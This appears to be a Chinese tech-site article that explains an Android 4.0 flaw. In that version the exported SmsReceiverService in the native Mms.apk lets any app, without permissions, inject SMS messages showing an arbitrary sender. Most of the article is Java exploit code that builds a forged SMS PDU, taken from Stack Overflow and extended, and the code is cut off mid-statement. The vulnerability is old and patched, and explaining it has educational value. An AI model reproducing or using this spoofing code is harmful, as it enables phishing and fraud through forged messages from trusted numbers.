首页 编程 软件学院 查看内容

Android系统的阿基里斯之踵:伪造短信篇

2014-10-13 15:41 1091 0

摘要: Android系统的日益强大,但Android平台的安全问题一直是其“阿基里斯之踵”。据统计,2012 年有 79% 的恶意软件都寄生于 Andriod 之上,此数字比 2011 年更高出 12.3%...
关键词: nbsp Calendar byte dateBytes reverseByte Android SmsUtil write stringToGsm get

Android系统的日益强大,但Android平台的安全问题一直是其“阿基里斯之踵”。据统计,2012 年有 79% 的恶意软件都寄生于 Andriod 之上,此数字比 2011 年更高出 12.3%。相较之下,iOS 平台内的恶意软件仅占总量的 0.7%,继续成为最安全的移动系统。本文利用android4.0的一个原生漏洞来伪造短信。无须声明任何权限即可伪造发送方为任何号码的短信给用户。 android4.0发布已经是很久很久很久很久以前的事情了,这个漏洞早就报了出来,之所以现在才写这篇文章,就是觉得,该升级的基本已经都升级了,该打补丁的基本都已经打了补丁,所以现在差不多是时候了。原生android4.0系统中,Mms.apk的manifest有这样一段<service android:name=".transaction.SmsReceiverService"  android:exported="true" />android:exported="true",意味着SmsReceiverService这个Service暴露给了大家,也让病毒有机可乘在stackoverflow上面,有人早就给出了伪造短信的方案,我们在这里就直接使用人家的代码好了http://stackoverflow.com/questions/12335642/create-pdu-for-android-that-works-with-smsmessage-createfrompdu-gsm-3gpp其中UCS-2处理是我新加上去的private static void createFakeSms(Context context, String sender,           String body) {       byte[] pdu = null;       byte[] scBytes = PhoneNumberUtils               .networkPortionToCalledPartyBCD("0000000000");       byte[] senderBytes = PhoneNumberUtils               .networkPortionToCalledPartyBCD(sender);       int lsmcs = scBytes.length;       // 时间处理,包括年月日时分秒以及时区和夏令时       byte[] dateBytes = new byte[7];       Calendar calendar = new GregorianCalendar();       dateBytes[0] = SmsUtil               .reverseByte((byte) (calendar.get(Calendar.YEAR)));       dateBytes[1] = SmsUtil               .reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));       dateBytes[2] = SmsUtil.reverseByte((byte) (calendar               .get(Calendar.DAY_OF_MONTH)));       dateBytes[3] = SmsUtil.reverseByte((byte) (calendar               .get(Calendar.HOUR_OF_DAY)));       dateBytes[4] = SmsUtil.reverseByte((byte) (calendar               .get(Calendar.MINUTE)));       dateBytes[5] = SmsUtil.reverseByte((byte) (calendar               .get(Calendar.SECOND)));       dateBytes[6] = SmsUtil               .reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar                       .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));       try {           ByteArrayOutputStream bo = new ByteArrayOutputStream();           bo.write(lsmcs);// 短信服务中心长度           bo.write(scBytes);// 短信服务中心号码           bo.write(0x04);           bo.write((byte) sender.length());// 发送方号码长度           bo.write(senderBytes);// 发送方号码           bo.write(0x00);// 协议标示,00为普通GSM,点对点方式           try {               String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";               Class<?> cReflectedNFCExtras = Class                       .forName(sReflectedClassName);               Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(                       "stringToGsm7BitPacked", new Class[] { String.class });               stringToGsm7BitPacked.setAccessible(true);               byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,                       body 声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部